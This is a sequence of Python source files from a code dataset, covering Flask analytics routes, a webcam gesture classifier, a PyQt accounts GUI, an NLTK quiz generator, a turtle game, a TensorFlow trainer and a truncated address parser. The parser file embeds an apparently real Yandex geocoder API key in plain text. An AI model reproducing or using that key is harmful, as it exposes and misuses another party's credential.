Here, we check if the user is authenticated.'''\r\n args = request.args\r\n user_id = args and args['user_id']\r\n try:\r\n total_count = db.session.query(Link).join(User).filter(User.id==user_id).count()\r\n total_enabled = db.session.query(Link).join(User).filter(and_(User.id==user_id, Link.disabled==False)).count()\r\n total_disabled = db.session.query(Link).join(User).filter(and_(User.id==user_id, Link.disabled==True)).count()\r\n total_engagements = db.session.query(Engagements).join(Link).filter(Link.user_id==user_id).count()\r\n \r\n return jsonify(\r\n links = ({'total_count': total_count, 'total_enabled': total_enabled, 'total_disabled': total_disabled, 'total_engagements': total_engagements}),\r\n message = 'Fetching links successfully',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n message = f\"An error occurred {e}\",\r\n status = 400\r\n ), 400\r\n \r\n@links_bp.route('/links//engagements', methods = ['GET'])\r\n@login_required2()\r\n@cross_origin(supports_credentials=True)\r\ndef get_single_link_engagements(link_id):\r\n '''This method is routed when the user requests analytics for a single link.'''\r\n try:\r\n engagements = db.session.query(Engagements).join(Link).filter(Link.id==link_id).all()\r\n _engagements = []\r\n for item in engagements:\r\n _engagements.append(item.to_json())\r\n return jsonify(\r\n engagements = _engagements,\r\n message = 'Fetching Analytics data successfully',\r\n status = 200\r\n ), 200\r\n except Exception as e:\r\n return jsonify(\r\n links = [],\r\n message = f'Fetching Analytics failed {e}',\r\n status = 400\r\n ), 400\r\n\r\n@links_bp.route('/links/engagements//create', methods = ['POST'])\r\n@cross_origin(supports_credentials=True)\r\ndef create_engagement(link_id):\r\n '''This method is routed when the user requests to create a new engagement for a link.'''\r\n try:\r\n data = request.get_json()\r\n utm_source=data.get('utm_source')\r\n utm_medium=data.get('utm_medium')\r\n utm_campaign=data.get('utm_campaign')\r\n utm_term=data.get('utm_term')\r\n utm_content=data.get('utm_content')\r\n\r\n engagement = Engagements(link_id=link_id, utm_source=utm_source, utm_medium=utm_medium,utm_campaign=utm_campaign, utm_term=utm_term, utm_content=utm_content)\r\n db.session.add(engagement)\r\n db.session.commit()\r\n\r\n return jsonify(\r\n engagement = engagement.to_json(),\r\n message = 'Create Engagement Successful',\r\n status = 201\r\n ), 201\r\n except Exception as e:\r\n return jsonify(\r\n message = f'Create Engagement Failed {e}',\r\n status = 400\r\n ), 400\r\n","sub_path":"backend/src/routes/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":13030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"61260080","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport random\nimport imutils\nfrom directkeys import PressKey, ReleaseKey, W, A, S, D\n\nPressKey(W)\n\nimg_array = np.empty((1, 200*80))\nimg_label = np.empty((1))\n#directory = \"D:/Machine Learning A-Z™ Hands-On Python & R In Data Science/practice/\"\nCATEGORIES = [\"up\", \"down\", \"left\", \"right\"]\nfor category in CATEGORIES: \n path = category \n for img in os.listdir(path): \n im = os.path.join(path, img)\n image = cv2.imread(im)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.resize(gray, (200, 80))\n gray = np.reshape(gray, (1, 200*80))\n img_array = np.append(img_array, gray, axis = 0)\n img_label = np.append(img_label, 
CATEGORIES.index(category))\n\nimg_array = np.delete(img_array, (0), axis=0)\nimg_label = np.delete(img_label, (0), axis=0)\n\nfrom sklearn.model_selection import train_test_split\ntrain_X, test_X, train_Y, test_Y = train_test_split(img_array, img_label, test_size = 0.1, random_state = 1)\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\ntrain_X = sc.fit_transform(train_X)\ntest_X = sc.transform(test_X)\n\nfrom sklearn.ensemble import RandomForestClassifier\nclassifier = RandomForestClassifier(n_estimators = 10, criterion = 'entropy', random_state = 0)\nclassifier.fit(train_X, train_Y)\n\n# Predicting the Test set results\ny_pred = classifier.predict(test_X)\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(test_Y, y_pred)\nprint(cm)\n\ncap = cv2.VideoCapture(0)\nwhile True:\n    _, frame = cap.read()\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    gray = cv2.GaussianBlur(gray, (21, 21), 0)\n    thresh_delta = cv2.threshold(gray, 160, 255, cv2.THRESH_BINARY)[1]\n    thresh_delta = cv2.dilate(thresh_delta, None, iterations=1)\n    contours, hierarchy = cv2.findContours(thresh_delta, cv2.RETR_EXTERNAL, \n                        cv2.CHAIN_APPROX_NONE)\n    for cnt in contours:\n        i=0\n        if cv2.contourArea(cnt) > 7500:\n            x, y, w, h = cv2.boundingRect(cnt)\n            cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),thickness=7)\n            cropped = thresh_delta[y:y + h, x:x + w] #cropping region of interest i.e. face area from image\n            cropped2=cv2.resize(cropped,(200,80))\n            Y_img = np.reshape(cropped2, (1, 200*80))\n            Y_pred = classifier.predict(Y_img)\n            print(Y_pred)\n            print(int(Y_pred[i]))\n            cv2.putText(frame, CATEGORIES[int(Y_pred[i])], (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2)\n            '''if CATEGORIES[int(Y_pred[i])] == CATEGORIES[0]:\n                PressKey(W)\n                ReleaseKey(W)\n            elif CATEGORIES[int(Y_pred[i])] == CATEGORIES[1]:\n                PressKey(S)\n                ReleaseKey(S)\n            elif CATEGORIES[int(Y_pred[i])] == CATEGORIES[2]:\n                PressKey(A)\n                ReleaseKey(A)\n            elif CATEGORIES[int(Y_pred[i])] == CATEGORIES[3]:\n                PressKey(D)\n                ReleaseKey(D) '''     \n            i = i + 1\n    cv2.imshow('frame', frame)\n    cv2.imshow('thresh', thresh_delta)\n\n    k = cv2.waitKey(1)\n    \n    if k == ord(\"q\"):\n        break\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"68840139","text":"from PIL import Image\nimport os\n\ndef folderImageShrink(directoryPath):\n    filenames = os.listdir(directoryPath)\n\n    for i in range(len(filenames)):\n        oldImageName = filenames[i]\n        oldImagePath = directoryPath + \"/\" + oldImageName\n        oldImage = Image.open(oldImagePath)\n        sizeImage = oldImage.size\n        width = sizeImage[0]\n        height = sizeImage[1]\n        resizeImage = oldImage.resize((int(width/2), int(height/2)))\n        # use splitext to drop the extension: str.rstrip('.jpg') strips characters, not a suffix\n        newImagePath = os.path.splitext(oldImagePath)[0] + '_new' + '.jpg'\n        resizeImage.save(newImagePath)\n\n#folderImageShrink('C:/Users/wyattshapiro/Pictures/Python Pictures')\n","sub_path":"resizeImage.py","file_name":"resizeImage.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"169756493","text":"import os\nimport sys\n\nfrom PyQt4 import QtCore, QtGui, uic\n\nfrom file_database_api import Files\nfrom gui_frame import Frame\nfrom gui_get_database_type import GetDatabaseType\nfrom gui_get_start_date import GetStartDate\nfrom gui_add_remove_account import 
AddRemoveAccount\nfrom gui_add_remove_entry import AddRemoveEntry\nfrom static_functions import date_serializer, date_placeholder_text, error_message\n\n__author__ = 'Gareth Mok'\n\nform_main = uic.loadUiType('main.ui')[0]\n\n\nclass MainWindow(QtGui.QMainWindow, form_main):\n def __init__(self, parent=None):\n QtGui.QMainWindow.__init__(self, parent)\n self.setupUi(self)\n\n self.last_session = Files('last_open.json')\n if not self.last_session.empty():\n if os.path.isdir(self.last_session.get_directory()):\n self.directory = self.last_session.get_directory()\n else:\n if getattr(sys, 'frozen', False): # frozen\n self.directory = os.path.dirname(os.path.realpath(sys.executable))\n else: # unfrozen\n self.directory = os.path.dirname(os.path.realpath(__file__))\n self.last_session.add_update(\"Directory\", self.directory)\n\n file_list = self.last_session.grab()\n sorted_names = sorted(file_list)\n for i, name in enumerate(sorted_names):\n if os.path.isfile(file_list[name]):\n new_tab = Frame(file_list[name], self)\n self.FileList.addTab(new_tab, name)\n self.act_refresh_accounts_triggered()\n else:\n self.last_session.remove(name)\n else:\n if getattr(sys, 'frozen', False): # frozen\n self.directory = os.path.dirname(os.path.realpath(sys.executable))\n else: # unfrozen\n self.directory = os.path.dirname(os.path.realpath(__file__))\n self.last_session.add_update(\"Directory\", self.directory)\n\n if self.FileList.currentWidget():\n self.FileList.currentWidget().tableAccountData.setFocus()\n\n self.connect_components()\n self.initialize_shortcuts()\n\n def connect_components(self):\n self.act_New.triggered.connect(self.act_new_triggered)\n self.act_Open.triggered.connect(self.act_open_triggered)\n self.act_Close_Tab.triggered.connect(self.act_close_tab_triggered)\n self.act_Change_Default_Directory.triggered.connect(self.act_change_default_account_directory_triggered)\n self.act_Change_Start_Date.triggered.connect(self.act_change_start_date_triggered)\n self.act_Exit.triggered.connect(self.act_exit_triggered)\n self.act_Refresh_Accounts.triggered.connect(self.act_refresh_accounts_triggered)\n self.act_Add_Account.triggered.connect(self.act_add_account_triggered)\n self.act_Add_Entry.triggered.connect(self.act_add_entry_triggered)\n self.act_Remove_Account.triggered.connect(self.act_remove_account_triggered)\n self.act_Remove_Entry.triggered.connect(self.act_remove_entry_triggered)\n self.FileList.currentChanged.connect(self.act_refresh_accounts_triggered)\n\n def initialize_shortcuts(self):\n QtGui.QShortcut(QtGui.QKeySequence(QtCore.Qt.CTRL + QtCore.Qt.Key_Tab),\n self, self.next_tab)\n QtGui.QShortcut(QtGui.QKeySequence(QtCore.Qt.CTRL + QtCore.Qt.SHIFT + QtCore.Qt.Key_Tab),\n self, self.previous_tab)\n\n def next_tab(self):\n new_index = (self.FileList.currentIndex() + 1) % self.FileList.count()\n self.FileList.setCurrentIndex(new_index)\n\n def previous_tab(self):\n new_index = self.FileList.currentIndex() - 1\n if new_index == -1:\n new_index = self.FileList.count() - 1\n self.FileList.setCurrentIndex(new_index)\n\n def act_new_triggered(self):\n \"\"\"\n Creates a new account database and opens it in a new tab\n :return:\n \"\"\"\n filename = QtGui.QFileDialog.getSaveFileName(QtGui.QFileDialog(), 'New file', self.directory, '*.json')\n if filename != '':\n database_type, ok = GetDatabaseType.get_database_type(self)\n if ok and database_type != '':\n start_date, ok = GetStartDate.get_start_date(date_placeholder_text(database_type),self)\n if ok and start_date != '':\n base_filename = 
os.path.basename(filename)\n\n try:\n new_tab = Frame(filename, database_type, date_serializer(database_type, start_date), self)\n\n self.FileList.addTab(new_tab, base_filename)\n self.FileList.setCurrentIndex(self.FileList.count() - 1)\n self.FileList.currentWidget().display_accounts()\n self.last_session.add_update(base_filename, filename)\n except ValueError as ve:\n error_message(ve)\n\n def act_open_triggered(self):\n \"\"\"\n Opens a file in current tab or new tab\n :return:\n \"\"\"\n filename = QtGui.QFileDialog.getOpenFileName(QtGui.QFileDialog(), 'Open file', self.directory, '*.json')\n if filename != '':\n base_filename = os.path.splitext(os.path.basename(filename))[0]\n\n for i in range(self.FileList.count()):\n text = str(self.FileList.tabText(i))\n if text == base_filename:\n self.FileList.setCurrentIndex(i)\n self.FileList.currentWidget().display_accounts()\n break\n else:\n new_tab = Frame(filename, self)\n self.FileList.addTab(new_tab, base_filename)\n self.FileList.setCurrentIndex(self.FileList.count() - 1)\n self.FileList.currentWidget().display_accounts()\n self.last_session.add_update(base_filename, filename)\n\n def act_close_tab_triggered(self):\n current = self.FileList.currentIndex()\n self.last_session.remove(str(self.FileList.tabText(current)))\n self.FileList.removeTab(current)\n\n def act_change_default_account_directory_triggered(self):\n self.directory = QtGui.QFileDialog.getExistingDirectory(QtGui.QFileDialog(), None,\n 'Choose Account Database Directory')\n self.last_session.add_update(\"Directory\", self.directory)\n\n def act_change_start_date_triggered(self):\n if self.FileList.currentWidget():\n self.FileList.currentWidget().display_accounts()\n\n database_type = self.FileList.currentWidget().data.get_type()\n start_date, ok = GetStartDate.get_start_date(date_placeholder_text(database_type), self)\n if ok and start_date:\n try:\n self.FileList.currentWidget().data.set_start_date(date_serializer(database_type, start_date))\n except ValueError as ve:\n error_message(ve)\n self.FileList.currentWidget().display_accounts()\n\n def act_exit_triggered(self):\n self.close()\n\n def act_refresh_accounts_triggered(self):\n if self.FileList.currentWidget():\n self.FileList.currentWidget().display_accounts()\n\n def act_add_account_triggered(self):\n if self.FileList.currentWidget():\n self.FileList.currentWidget().display_accounts()\n name, skip, ok = AddRemoveAccount.get_account_details(\n self.FileList.currentWidget().data.grab_account_names(), False, self)\n if ok and name:\n self.FileList.currentWidget().data.add_account(name, skip)\n self.FileList.currentWidget().display_accounts()\n\n def act_add_entry_triggered(self):\n if self.FileList.currentWidget():\n self.FileList.currentWidget().display_accounts()\n database_type = self.FileList.currentWidget().data.get_type()\n name, date, money, ok = AddRemoveEntry.get_entry_details(\n self.FileList.currentWidget().data.grab_account_names(), 0, date_placeholder_text(database_type), self)\n if ok and name and date and money:\n try:\n self.FileList.currentWidget().data.add_entry(name, date_serializer(database_type, date), money)\n except ValueError as ve:\n error_message(ve)\n\n self.FileList.currentWidget().display_accounts()\n\n def act_remove_account_triggered(self):\n if self.FileList.currentWidget():\n self.FileList.currentWidget().display_accounts()\n name, skip, ok = AddRemoveAccount.get_account_details(\n self.FileList.currentWidget().data.grab_account_names(), True, self)\n if ok and name:\n 
self.FileList.currentWidget().data.remove_account(name)\n                self.FileList.currentWidget().display_accounts()\n\n    def act_remove_entry_triggered(self):\n        if self.FileList.currentWidget():\n            self.FileList.currentWidget().display_accounts()\n            database_type = self.FileList.currentWidget().data.get_type()\n            name, date, money, ok = AddRemoveEntry.get_entry_details(\n                self.FileList.currentWidget().data.grab_account_names(), 1, date_placeholder_text(database_type), self)\n            if ok and name and date:\n                try:\n                    self.FileList.currentWidget().data.remove_entry(name, date_serializer(database_type, date))\n                except ValueError as ve:\n                    error_message(ve)\n\n            self.FileList.currentWidget().display_accounts()\n\n\ndef main():\n    app = QtGui.QApplication(sys.argv)\n    my_window = MainWindow(None)\n    my_window.show()\n    my_window.act_refresh_accounts_triggered()\n    sys.exit(app.exec_())\n\nif __name__ == '__main__':\n    main()\n","sub_path":"gui_main.py","file_name":"gui_main.py","file_ext":"py","file_size_in_byte":9906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"26301997","text":"\n# Import packages\nimport re\nimport nltk\nimport numpy as np\nfrom nltk.corpus import wordnet as wn\n\n\nclass ObjectiveTest:\n    \"\"\"Class abstraction for objective test generation module\n    \"\"\"\n\n    def __init__(self, filepath):\n        \"\"\"Class constructor\n        \n        Arguments:\n            filepath {str} -- Absolute path to the corpus file\n        \"\"\"\n        try:\n            with open(filepath, mode=\"r\") as fp:\n                self.summary = fp.read()\n        except FileNotFoundError as e:\n            print(\"Warning raised at `ObjectiveTest.__init__`\", e)\n\n    def get_trivial_sentences(self):\n        \"\"\"Method to identify sentences with potential to create objective questions\n        \n        Returns:\n            list -- Sentences with potential to create objective questions\n        \"\"\"\n        # Sentence tokenization\n        sentences = nltk.sent_tokenize(self.summary)\n        trivial_sentences = list()\n        # Identify trivial sentences\n        for sent in sentences:\n            trivial = self.identify_trivial_sentences(sent)\n            if trivial:\n                trivial_sentences.append(trivial)\n            else:\n                continue\n        return trivial_sentences\n\n    def identify_trivial_sentences(self, sentence):\n        \"\"\"Method to evaluate if a given sentence has the potential to generate an objective question.\n        \n        Arguments:\n            sentence {str} -- String sequence generated from a `sentence_tokenizer`\n        \n        Returns:\n            dict -- Question formed along with the correct answer in case of potential sentence\n            else return `None`\n        \"\"\"\n        # If the sentence starts with an adverb or is less than 4 words long, it is probably not the best fit\n        # (pos_tag expects a token list, so tokenize first instead of tagging raw characters)\n        tags = nltk.pos_tag(nltk.word_tokenize(sentence))\n        if tags[0][1] == \"RB\" or len(nltk.word_tokenize(sentence)) < 4:\n            return None\n        \n        # Extract noun phrases from the sentence\n        # (angle-bracket POS tags restored; they were stripped from the extracted source)\n        noun_phrases = list()\n        grammar = r\"\"\"\n            CHUNK: {<NN>+<IN|DT>*<NN>+}\n                {<NN>+<IN|DT>*<NNP>+}\n                {<JJ>*<NN>+}\n            \"\"\"\n        chunker = nltk.RegexpParser(grammar)\n        tokens = nltk.word_tokenize(sentence)\n        pos_tokens = nltk.tag.pos_tag(tokens)\n        tree = chunker.parse(pos_tokens)\n\n        # Select phrase\n        for subtree in tree.subtrees():\n            if subtree.label() == \"CHUNK\":\n                temp = \"\"\n                for sub in subtree:\n                    temp += sub[0]\n                    temp += \" \"\n                temp = temp.strip()\n                noun_phrases.append(temp)\n        \n        # Replace nouns\n        replace_nouns = []\n        for word, _ in tags:\n            for phrase in noun_phrases:\n                if phrase[0] == '\\'':\n                    # If it starts with an apostrophe, ignore it\n                    # (this is a weird error that should probably be handled elsewhere)\n                    break\n                if word in phrase:\n                    # Blank out the last two words in this phrase\n
                    [replace_nouns.append(phrase_word) for phrase_word in phrase.split()[-2:]]\n                    break\n            # If we couldn't find the word in any phrases\n            if len(replace_nouns) == 0:\n                replace_nouns.append(word)\n                break\n        \n        if len(replace_nouns) == 0:\n            # Return None if we found no words to replace\n            return None\n        \n        val = 99\n        for i in replace_nouns:\n            if len(i) < val:\n                val = len(i)\n            else:\n                continue\n        \n        trivial = {\n            \"Answer\": \" \".join(replace_nouns),\n            \"Key\": val\n        }\n\n        if len(replace_nouns) == 1:\n            # If we're only replacing one word, use WordNet to find similar words\n            trivial[\"Similar\"] = self.answer_options(replace_nouns[0])\n        else:\n            # If we're replacing a phrase, don't bother - it's too unlikely to make sense\n            trivial[\"Similar\"] = []\n        \n        # Blank out our replace words (only the first occurrence of the word in the sentence)\n        replace_phrase = \" \".join(replace_nouns)\n        blanks_phrase = (\"__________\" * len(replace_nouns)).strip()\n        # Compile regular expression\n        expression = re.compile(re.escape(replace_phrase), re.IGNORECASE)\n        sentence = expression.sub(blanks_phrase, str(sentence), count=1)\n        trivial[\"Question\"] = sentence\n        return trivial\n\n    @staticmethod\n    def answer_options(word):\n        \"\"\"Method to identify objective answer options\n        \n        Arguments:\n            word {str} -- Actual answer to the question which is to be used for generating other deceiving options\n        \n        Returns:\n            list -- Other answer options\n        \"\"\"\n        # In the absence of a better method, take the first synset\n        synsets = wn.synsets(word, pos=\"n\")\n\n        # If there aren't any synsets, return an empty list\n        if len(synsets) == 0:\n            return []\n        else:\n            synset = synsets[0]\n        \n        # Get the hypernym for this synset (again, take the first)\n        hypernym = synset.hypernyms()[0]\n        # Get some hyponyms from this hypernym\n        hyponyms = hypernym.hyponyms()\n        # Take the name of the first lemma for the first 8 hyponyms\n        similar_words = []\n        for hyponym in hyponyms:\n            similar_word = hyponym.lemmas()[0].name().replace(\"_\", \" \")\n            if similar_word != word:\n                similar_words.append(similar_word)\n                if len(similar_words) == 8:\n                    break\n        return similar_words\n\n    def generate_test(self, num_of_questions=3):\n        \"\"\"Method to generate an objective test i.e., a set of questions and required options for answer.\n\n        Arguments:\n            num_of_questions {int} -- Integer denoting number of questions to set in the test.\n        \n        Returns:\n            list, list -- A pair of lists containing questions and answer options respectively.\n        \"\"\"\n        trivial_pair = self.get_trivial_sentences()\n        question_answer = list()\n        for que_ans_dict in trivial_pair:\n            if que_ans_dict[\"Key\"] > 3:\n                question_answer.append(que_ans_dict)\n            else:\n                continue\n        question = list()\n        answer = list()\n        while len(question) < num_of_questions:\n            rand_num = np.random.randint(0, len(question_answer))\n            if question_answer[rand_num][\"Question\"] not in question:\n                question.append(question_answer[rand_num][\"Question\"])\n                answer.append(question_answer[rand_num][\"Answer\"])\n            else:\n                continue\n        return question, answer","sub_path":"src/objective.py","file_name":"objective.py","file_ext":"py","file_size_in_byte":6816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"562277331","text":"import os\nimport random\nimport turtle\nimport subprocess\nimport pygame\nimport time\n\n\n\n\n# quickfart = pygame.mixer.music(\"quickfart.mp3\")\n\nturtle.fd(0)\nturtle.speed(0)\nturtle.bgcolor(\"black\")\nturtle.ht()\nturtle.setundobuffer(1)\nturtle.tracer(1)\n\nclass 
Sprite(turtle.Turtle):\n def __init__(self, spriteshape, color, startx, starty):\n turtle.Turtle.__init__(self, shape = spriteshape)\n self.speed(0)\n self.penup()\n self.color(color)\n self.fd(0)\n self.goto(startx, starty)\n self.speed = 1\n\n def move(self):\n self.fd(self.speed)\n \n #boundary detection\n if self.xcor() > 290:\n self.setx(290)\n self.rt(60)\n if self.xcor() < -290:\n self.setx(-290)\n self.rt(60)\n if self.ycor() > 290:\n self.sety(290)\n self.rt(60)\n if self.ycor() < -290:\n self.sety(-290)\n self.rt(60)\n\n #check sprite collision\n def is_collision(self, other):\n if (self.xcor() >= (other.xcor() - 20)) and \\\n (self.xcor() <= (other.xcor() + 20)) and \\\n (self.ycor() >= (other.ycor() - 20)) and \\\n (self.ycor() <= (other.ycor() + 20)):\n return True\n else:\n return False\n\n \n\nclass Player(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.speed = 4\n self.lives = 3\n\n\n def turn_left(self):\n self.lt(45)\n \n def turn_right(self):\n self.rt(45)\n\n def accelerate(self):\n self.speed += 1\n\n def decelerate(self):\n self.speed -= 1\n\nclass Enemy(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.speed = 6\n self.setheading(random.randint(0, 360))\n\nclass Ally(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.speed = 8\n self.setheading(random.randint(0, 360))\n\n def move(self):\n self.fd(self.speed)\n \n #boundary detection\n if self.xcor() > 290:\n self.setx(290)\n self.lt(60)\n if self.xcor() < -290:\n self.setx(-290)\n self.lt(60)\n if self.ycor() > 290:\n self.sety(290)\n self.lt(60)\n if self.ycor() < -290:\n self.sety(-290)\n self.lt(60)\n \nclass Missile(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.shapesize(stretch_wid = 0.3, stretch_len = 0.4, outline=None)\n self.speed = 20\n self.status = \"ready\"\n #self.goto(-1000, 1000)\n \n\n def fire(self):\n if self.status == \"ready\":\n #Play missile sound\n #os.system(\"afplay quickfart.wav&\")\n #pygame.init()\n pygame.mixer.music.load(\"quickfart.wav\")\n pygame.mixer.music.play()\n time.sleep(2)\n pygame.mixer.music.stop()\n \n self.goto(player.xcor(), player.ycor())\n self.setheading(player.heading())\n self.status = \"firing\"\n\n def move(self):\n if self.status == \"ready\":\n self.goto(1000, -1000)\n \n \n if self.status == \"firing\":\n self.fd(self.speed)\n\n #border check\n if self.xcor() > 290 or self.xcor() < -290 or\\\n self.ycor() > 290 or self.ycor() < -290:\n self.goto(-1000, 1000)\n self.status = \"ready\"\n\n\n\nclass Game():\n def __init__(self):\n self.level = 1\n self.score = 0\n self.state = \"playing\"\n self.pen = turtle.Turtle()\n self.lives = 3\n\n def draw_border(self):\n #draw border\n self.pen.speed(0)\n self.pen.color(\"white\")\n self.pen.pensize(3)\n self.pen.penup()\n self.pen.goto(-300, 300)\n self.pen.pendown()\n for side in range(4):\n self.pen.fd(600)\n self.pen.rt(90)\n self.pen.penup()\n self.pen.ht()\n self.pen.pendown()\n\n def show_status(self):\n self.pen.undo()\n msg = \"Score: %s\" %(self.score)\n self.pen.penup()\n self.pen.goto(-300, 310)\n self.pen.write(msg, font=(\"Arial\", 16, \"normal\"))\n\n\n\n#create game object\ngame = Game()\n\n#draw the game border\ngame.draw_border()\n\n#show game 
status\ngame.show_status()\n\n\n#create my sprites\nplayer = Player(\"triangle\", \"white\", 0, 0)\n\nenemy = Enemy(\"circle\", \"red\", 100, 100)\n\nmissile = Missile(\"triangle\", \"yellow\", 1000, -1000)\n\nally = Ally(\"square\", \"blue\", 0, 0)\n\n#keyboard bindings\nturtle.onkey(player.turn_left, \"Left\")\nturtle.onkey(player.turn_right, \"Right\")\nturtle.onkey(player.accelerate, \"Up\")\nturtle.onkey(player.decelerate, \"Down\")\nturtle.onkey(missile.fire, \"space\")\nturtle.listen()\n\n\n#main game loop\nwhile True:\n\n enemy.move()\n player.move()\n missile.move()\n ally.move()\n\n\n #check for collision\n if player.is_collision(enemy):\n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n player.goto(x, y)\n player.setheading(random.randint(0, 360))\n game.score -= 100\n game.show_status()\n\n \n if missile.is_collision(enemy):\n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n enemy.goto(x, y)\n missile.status = \"ready\"\n enemy.setheading(random.randint(0, 360))\n #increase score\n game.score += 100\n game.show_status()\n \n if missile.is_collision(ally):\n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n ally.goto(x, y)\n missile.status = \"ready\"\n ally.setheading(random.randint(0, 360))\n #decrease score\n game.score -= 50\n game.show_status()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pythonPractice/spaceWar.py","file_name":"spaceWar.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87168164","text":"\nfrom absl import flags\nfrom absl import app\n\nimport os\nimport tensorflow as tf\nimport numpy as np\n\nfrom tensorflow.keras import Input, Model\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D, Dropout, Dense, add\n\n#tf.enable_eager_execution()\n\n\nIMAGE_SHAPE = (32, 32, 3)\nNUM_CLASSES = 10\n\ndef toy_resnet_model():\n inputs = Input(shape=IMAGE_SHAPE, name='image')\n x = Conv2D(32, 3, activation='relu')(inputs)\n x = Conv2D(64, 3, activation='relu')(x)\n block_1_output = MaxPooling2D(3)(x)\n \n x = Conv2D(64, 3, activation='relu', padding='same')(block_1_output)\n x = Conv2D(64, 3, activation='relu', padding='same')(x)\n block_2_output = add([x, block_1_output])\n \n x = Conv2D(64, 3, activation='relu', padding='same')(x)\n x = Conv2D(64, 3, activation='relu', padding='same')(x)\n block_3_output = add([x, block_2_output])\n \n x = Conv2D(64, 3, activation='relu')(block_3_output)\n x = GlobalAveragePooling2D()(x)\n x = Dense(256, activation='relu')(x)\n x = Dropout(0.5)(x)\n outputs = Dense(10, activation='softmax')(x)\n \n model = Model(inputs, outputs, name='toy_resnet')\n \n return model\n\n\ndef prepare_datasets():\n def _parse_record(example_proto):\n features = {\n 'image': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.int64, default_value=0)\n }\n \n parsed_features = tf.parse_single_example(example_proto, features)\n image = parsed_features['image']\n label = parsed_features['label']\n \n image = tf.image.decode_png(image, channels=3)\n image = tf.cast(image, tf.float32)\n image = image / 255\n \n label = tf.one_hot(label, NUM_CLASSES)\n \n return image, label\n\n \n train_dataset = tf.data.TFRecordDataset(FLAGS.train_files)\n eval_dataset = tf.data.TFRecordDataset(FLAGS.eval_files)\n \n train_dataset = train_dataset.map(_parse_record)\n eval_dataset = eval_dataset.map(_parse_record)\n \n train_dataset = 
train_dataset.shuffle(4096).batch(FLAGS.batch_size).repeat()\n eval_dataset = eval_dataset.batch(FLAGS.batch_size).repeat()\n \n return train_dataset, eval_dataset\n\n\ndef train_evaluate():\n \n train_dataset, eval_dataset = prepare_datasets()\n \n model = toy_resnet_model()\n \n model.compile(optimizer=tf.keras.optimizers.RMSprop(1e-3),\n loss=\"categorical_crossentropy\",\n metrics=[\"accuracy\"]\n )\n\n callbacks = [\n #tf.keras.callbacks.TensorBoard(log_dir=FLAGS['job-dir'].value, update_freq='epoch')\n tf.keras.callbacks.TensorBoard(log_dir=FLAGS['job-dir'].value)\n ]\n \n model.fit(train_dataset,\n epochs=FLAGS.epochs,\n steps_per_epoch=1000,\n #callbacks=callbacks,\n validation_data=eval_dataset,\n validation_steps=200)\n \n \n\nFLAGS = flags.FLAGS\nflags.DEFINE_list(\"train_files\", None, \"Training TFRecord files\")\nflags.DEFINE_list(\"eval_files\", None, \"Evaluation TFRecord files\")\n\nflags.DEFINE_integer(\"epochs\", 5, \"Number of epochs to train\")\nflags.DEFINE_integer(\"batch_size\", 32, \"Batch size\")\nflags.DEFINE_integer(\"steps_per_epoch\", 1000, \"Steps per epoch\")\nflags.DEFINE_integer(\"validation_steps\", 20, \"Batch size\")\n\nflags.DEFINE_string(\"job-dir\", None, \"Job dir\")\n\n# Required flags\nflags.mark_flag_as_required(\"train_files\")\nflags.mark_flag_as_required(\"eval_files\")\n\n\ndef main(argv):\n del argv #Unused\n \n train_evaluate()\n \n\nif __name__ == '__main__':\n \n app.run(main)\n","sub_path":"training-singlenode/train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"603030404","text":"from yargy import (\n Parser, or_\n)\n\nfrom yargy import interpretation\nfrom yargy.interpretation import fact, attribute\n\nimport sys\nsys.path.append('/home/bun/natasha')\n\nfrom natasha_expanded.grammars import address\n\nimport requests\nfrom functools import lru_cache\n\nYNDX_GEO_KEY = '29d541ba-6887-4e71-be53-b00d7e178147'\n\n@lru_cache(maxsize=2**11)\ndef get_coordinates(geocode):\n r = requests.get(f'https://geocode-maps.yandex.ru/1.x/?apikey={YNDX_GEO_KEY}&geocode={geocode}&format=json&results=1')\n featureMember = r.json()['response']['GeoObjectCollection']['featureMember']\n if featureMember:\n r = featureMember[0]['GeoObject']['Point']['pos']\n long, lat = [float(i) for i in r.split(' ')]\n return long, lat\n else:\n return None, None\n\nAddress = fact(\n 'Address',\n 